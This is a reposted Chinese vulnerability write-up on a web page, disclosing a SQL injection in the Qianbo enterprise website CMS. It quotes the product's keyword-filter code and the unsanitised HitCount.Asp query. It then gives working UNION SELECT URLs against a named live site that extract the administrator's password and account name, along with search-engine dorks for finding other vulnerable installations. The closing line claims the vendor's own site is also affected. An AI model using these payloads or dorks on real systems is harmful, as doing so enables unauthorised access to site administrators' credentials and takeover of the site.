首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

千博企业网站管理系统Oday

作者:三毛 | 来源:互联网 | 2017-11-11 17:39
发布日期:2010-04-19发布作者:Lan3a影响版本:全部漏洞描述:程序都加入了防注入代码的,在NoSql.asp文件中%IfEnableStopInjectionTrueThenDimFy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstrFy_In|;|and|exec|insert|select|

发布日期:2010-04-19 
发布作者:Lan3a  
影响版本: 全部 
漏洞描述: 
程序都加入了防注入代码的,在NoSql.asp文件中
<%  If EnableStopInjection = True Then  Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr  Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare" Fy_Inf = Split(Fy_In, "|")  If Request.Form<>"" Then  For Each Fy_Post In Request.Form  For Fy_Xh = 0 To UBound(Fy_Inf)  If InStr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh))<>0 Then  Response.Write ""  Response.End  End If  Next  Next  End If   If Request.QueryString<>"" Then  For Each Fy_Get In Request.QueryString  For Fy_Xh = 0 To UBound(Fy_Inf)  If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh))<>0 Then  Response.Write ""  Response.End  Response.End  End If  Next  Next  End If  End If  %> 
没有过滤COOKIE,不过程序在对变量传入时都限制了整型的,所以我也没办法。

继续看。

MemberLogin.Asp这个文件 

Dim LoginName, LoginPassword, VerifyCode, MemName, Password, GroupID, GroupName, Working, rs, sql  LoginName = Trim(request.Form("LoginName"))  LoginPassword = Md5(request.Form("LoginPassword"))  Set rs = server.CreateObject("adodb.recordset")  sql = "select * from Qianbo_Members where MemName='"&LoginName&"'"  
没有加入防注入代码,不过却是登录验证页面,如果是MSsql数据库我们还好办点。

这个时候,在HitCount.Asp这个文件里发现,文件没有调用防注入代码

<%  Dim rs, m_SQL  Dim m_ID  m_ID = ReplaceBadChar(Request.QueryString("id"))  m_LX = ReplaceBadChar(Request.QueryString("LX"))  action = ReplaceBadChar(Request.QueryString("action"))  If action = "count" Then  conn.Execute("update "&m_LX&" set ClickNumberClickNumber = ClickNumber + 1 where ID=" & m_ID & "")  Else  m_SQL = "select ClickNumber from "&m_LX&" where ID=" & m_ID  Set rs = conn.Execute(m_SQL)  response.Write "document.write("&rs(0)&");"  rs.Close  Set rs = Nothing End If  %>  就是这个文件了。我们来构造注入语句
 

如下:

http://blog.cfyhack.cn/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20password%20from%20qianbo_admin   获取管理密码

http://blog.cfyhack.cn/hitcount.asp?lx=Qianbo_about&id=1%20and%201=2%20union%20select%20adminname%20from%20qianbo_admin  获取管理帐号

关键字:
 

inurl:Search.Asp?Range=Product&Keyword=
inurl:ProductBuy.Asp?ProductNo=
 


官网也存在这个问题,通杀。


推荐阅读
  • post

    Oracle Database 10g许可授予信息及高级功能详解

    Oracle Database 10g许可授予信息及高级功能详解
    本文介绍了Oracle Database 10g许可授予信息及其中的高级功能,包括数据库优化数据包、SQL访问指导、SQL优化指导、SQL优化集和重组对象。同时提供了详细说明,指导用户在Oracle Database 10g中如何使用这些功能。 ... [详细]
  • jsp

    延迟注入工具(python)的SQL脚本

    延迟注入工具(python)的SQL脚本
    本文介绍了一个延迟注入工具(python)的SQL脚本,包括使用urllib2、time、socket、threading、requests等模块实现延迟注入的方法。该工具可以通过构造特定的URL来进行注入测试,并通过延迟时间来判断注入是否成功。 ... [详细]
  • jsp

    Mybatis中#与$的区别及其作用详解

    本文详细介绍了Mybatis中#与$的区别及其作用。#{}可以防止sql注入,拼装sql时会自动添加单引号,适用于单个简单类型的形参。${}则将拿到的值直接拼装进sql,可能会产生sql注入问题,需要手动添加单引号,适用于动态传入表名或字段名。#{}可以实现preparedStatement向占位符中设置值,自动进行类型转换,有效防止sql注入,提高系统安全性。 ... [详细]
  • php

    浅解XXE与Portswigger Web Sec

    浅解XXE与Portswigger Web Sec
    XXE与PortswiggerWebSec​相关链接:​博客园​安全脉搏​FreeBuf​XML的全称为XML外部实体注入,在学习的过程中发现有回显的XXE并不多,而 ... [详细]
  • select

    PreparedStatement防止SQL注入

    PreparedStatement防止SQL注入
    添加数据:packagecom.hyc.study03;importcom.hyc.study02.utils.JDBCUtils;importjava.sql ... [详细]
  • jsp

    java开发中常用框架优缺点

    一、Struts2是一个基于MVC设计模式的Web应用框架在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts2优点1、实现 ... [详细]
  • jsp

    数据库基本介绍

    数据库基本介绍
    1、数据库基本知识概念:数据库:database(DB),是一种存储数据的仓库数据库是根据数据结构组织、存储和 ... [详细]
  • char

    MySQL:互联网公司常用 分库分表

    MySQL:互联网公司常用 分库分表
    本文目录一、数据库瓶颈IO瓶颈CPU瓶颈二、分库分表水平分库水平分表垂直分库垂直分表三、分库分表工具四、分库分表步骤五、分库分表问题非partit ... [详细]
  • char

    解决方案_记录一次MySQL两千万数据的大表优化解决过程,提供三种解决方案

    篇首语:本文由编程笔记#小编为大家整理,主要介绍了记录一次MySQL两千万数据的大表优化解决过程,提供三种解决方案相关的知识,希望对你有一定的参考价值。 ... [详细]
  • client

    《Python3 网络爬虫开发实战》:高效实用的 MongoDB 文档存储

    《Python3 网络爬虫开发实战》:高效实用的 MongoDB 文档存储
    NoSQL,全称NotOnlySQL,意为不仅仅是SQL,泛指非关系型数据库。NoSQL是基于键值对的,而且不需要经过SQL ... [详细]
  • char

    MySQL数据库简介与基本语法

    目录一、MySQL数据库1.简介2.用管理员身份登录3.密码相关操作4.SQL与NoSQL5.数据库重要概念二、MySQL基本语句1.基于库的增删改查2.基于表的增删改查3.基于记 ... [详细]
  • post

    在Ubuntu中安装MongoDB

    在Ubuntu中安装MongoDB
    nsitionalENhttp:www.w3.orgTRxhtml1DTDxhtml1-transitional.dtd ... [详细]
  • post

    架构师必读:日均500万数据,如何进行数据存储选型?

    架构师必读:日均500万数据,如何进行数据存储选型?
    点击上方关注我,选择“置顶或者星标”作者:麦田里的老农来源:https:zhuanlan.zhihu.comp37964096小编公司有一 ... [详细]
  • post

    qt mysql 锁_Qt 数据库(支持10种数据库)

    Qt提供了QtSql模块来提供平台独立的基于SQL的数据库操作。这里我们所说的“平台独立”,既包括操作系统平台,有包括各个数据库平台。另外, ... [详细]
  • char

    Oracle中存储过程和函数的区别

    Oracle中存储过程和函数的区别
    nsitionalENhttp:www.w3.orgTRxhtml1DTDxhtml1-transitional.dtd ... [详细]
author-avatar
三毛
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有